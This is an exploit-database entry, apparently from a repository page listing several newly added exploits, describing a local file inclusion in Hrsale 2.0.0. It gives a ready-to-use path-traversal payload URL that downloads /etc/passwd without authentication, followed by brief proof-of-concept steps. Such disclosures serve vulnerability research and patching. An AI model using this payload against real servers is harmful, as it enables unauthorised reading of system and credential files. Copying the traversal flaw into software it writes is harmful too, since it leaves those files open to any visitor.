1539c20e48
8 changes to exploits/shellcodes Hrsale 2.0.0 - Local File Inclusion School Faculty Scheduling System 1.0 - Stored Cross Site Scripting POC School Faculty Scheduling System 1.0 - Authentication Bypass POC GOautodial 4.0 - Authenticated Shell Upload Stock Management System 1.0 - 'Product Name' Persistent Cross-Site Scripting Stock Management System 1.0 - 'Categories Name' Persistent Cross-Site Scripting Stock Management System 1.0 - 'Brand Name' Persistent Cross-Site Scripting Tiki Wiki CMS Groupware 21.1 - Authentication Bypass
15 lines
No EOL
508 B
Text
15 lines
No EOL
508 B
Text
# Exploit Title: Hrsale 2.0.0 - Local File Inclusion
|
|
# Date: 10/21/2020
|
|
# Exploit Author: Sosecure
|
|
# Vendor Homepage: https://hrsale.com/index.php
|
|
# Version: version 2.0.0
|
|
|
|
Description:
|
|
This exploit allow you to download any readable file from server with out permission and login session.
|
|
|
|
Payload :
|
|
https://hrsale/download?type=files&filename=../../../../../../../../etc/passwd
|
|
POC:
|
|
|
|
1. Access to HRsale application and browse to download path with payload
|
|
2. Get /etc/passwd |